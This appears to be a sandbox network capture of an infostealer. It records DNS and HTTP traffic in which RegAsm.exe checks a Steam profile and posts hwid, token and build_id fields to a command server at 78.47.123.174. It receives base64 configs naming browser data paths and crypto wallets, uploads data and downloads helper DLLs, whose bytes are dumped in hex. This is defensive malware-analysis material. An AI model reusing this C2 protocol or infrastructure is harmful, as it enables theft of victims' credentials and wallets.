                                                                          May 22, 2024 18:28:26.168857098 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.947407961 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.947537899 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.948105097 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.948115110 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:26.948348999 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:26.948354959 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.603365898 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.603440046 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.603490114 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.603530884 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.603745937 CEST49723443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.603761911 CEST4434972378.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.626060963 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.626105070 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:27.626188993 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.626491070 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:27.626506090 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:28.326180935 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:28.326268911 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:28.326663017 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:28.326673031 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:28.326848030 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:28.326854944 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.005548954 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.005616903 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.005697012 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.005737066 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.006730080 CEST49724443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.006751060 CEST4434972478.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.682449102 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.682519913 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:29.682637930 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.682842016 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:29.682866096 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.364727020 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.364809990 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365339994 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365356922 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365577936 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365586996 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365667105 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365685940 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365783930 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.365807056 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.365984917 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.366013050 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:30.366147995 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:30.366166115 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.586226940 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.586327076 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.586330891 CEST4434972578.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:31.586385012 CEST49725443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:31.586642981 CEST49725443192.168.2.678.47.123.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 22, 2024 18:27:54.629149914 CEST | 50112 | 53 | 192.168.2.6 | 1.1.1.1
May 22, 2024 18:27:54.689308882 CEST | 53 | 50112 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 22, 2024 18:27:54.629149914 CEST | 192.168.2.6 | 1.1.1.1 | 0xb5d0 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 22, 2024 18:27:54.689308882 CEST | 1.1.1.1 | 192.168.2.6 | 0xb5d0 | No error (0) | steamcommunity.com | | 23.197.127.21 | A (IP address) | IN (0x0001) | false

• steamcommunity.com
• 78.47.123.174
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 23.197.127.21 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:27:55 UTC | 119 | OUT | GET /profiles/76561199689717899 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:27:56 UTC | 1882 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 22 May 2024 16:27:55 GMT
Content-Length: 35638
Connection: close
Set-Cookie: sessionid=6f763cd1794efcf320c6f1a3; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
2024-05-22 16:27:56 UTC | 14502 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-22 16:27:56 UTC | 10074 | IN | Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
2024-05-22 16:27:56 UTC | 11062 | IN | Data Ascii: quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;SNR&quot;:&quot;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49700 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:27:57 UTC | 186 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:27:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:27:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:27:57 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49701 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:27:58 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:27:58 UTC | 279 | OUT | Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="hwid"C14AC111A96A2176218386-a33c7340-61ca-11ee-8c18-806e6f6e6963------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------
2024-05-22 16:27:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:27:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:27:59 UTC | 69 | IN | Data Ascii: 3a1|1|1|0|908d1e004763457b9adffa3b0a9346c9|1|1|1|0|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49702 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:27:59 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:27:59 UTC | 331 | OUT | Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HIJEGIIJDGHDGCBGHCAACont
2024-05-22 16:28:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:00 UTC | 1564 | IN | Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49703 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:28:01 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:01 UTC | 331 | OUT | Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HDGDHCGCBKFHJKEBKFBFCont
2024-05-22 16:28:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:02 UTC | 5605 | IN | Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49704 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:28:02 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:02 UTC | 332 | OUT | Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------GHJDBAKEHDHDGCAKKJJECont
2024-05-22 16:28:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:03 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49705 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:28:04 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 6949
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:04 UTC | 6949 | OUT | Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------IDBKKKKKFBGDGDHIDBGHCont
2024-05-22 16:28:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:05 UTC | 12 | IN | Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.6  49706        78.47.123.174   443               5768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-22 16:28:05 UTC  194  OUT  GET /sqls.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:05 UTC  248  IN  HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:05 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Sun, 19 May 2024 16:18:18 GMT
Connection: close
ETag: "664a264a-258600"
Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.6  49707        78.47.123.174   443               5768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-22 16:28:09 UTC  278  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:09 UTC  829  OUT  Data Ascii:
------IEHCAKKJDBKKFHJJDHII
Content-Disposition: form-data; name="token"

908d1e004763457b9adffa3b0a9346c9
------IEHCAKKJDBKKFHJJDHII
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------IEHCAKKJDBKKFHJJDHII
Cont
2024-05-22 16:28:09 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:09 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.6  49708        78.47.123.174   443               5768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-22 16:28:10 UTC  278  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:10 UTC  437  OUT  Data Ascii:
------DBFCBGCGIJKJKECAKEGC
Content-Disposition: form-data; name="token"

908d1e004763457b9adffa3b0a9346c9
------DBFCBGCGIJKJKECAKEGC
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------DBFCBGCGIJKJKECAKEGC
Cont
2024-05-22 16:28:11 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:11 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.6  49709        78.47.123.174   443               5768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-22 16:28:12 UTC  278  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-22 16:28:12 UTC  437  OUT  Data Ascii:
------FHDAFIIDAKJDGDHIDAKJ
Content-Disposition: form-data; name="token"

908d1e004763457b9adffa3b0a9346c9
------FHDAFIIDAKJDGDHIDAKJ
Content-Disposition: form-data; name="build_id"

c21b45a432889af65aa05cd66920d0a2
------FHDAFIIDAKJDGDHIDAKJ
Cont
2024-05-22 16:28:12 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-22 16:28:12 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.6  49711        78.47.123.174   443               5768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-22 16:28:13 UTC  173  OUT  GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-22 16:28:13 UTC  246  IN  HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:13 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
                                                                          Data Ascii: 0<48%8A)$(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49715 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:28:14 UTC | 173 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-22 16:28:15 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:15 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49717 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:28:16 UTC | 174 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-22 16:28:17 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:17 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49718 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:28:18 UTC | 170 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-22 16:28:18 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 22 May 2024 16:28:18 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes
                                                                          Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
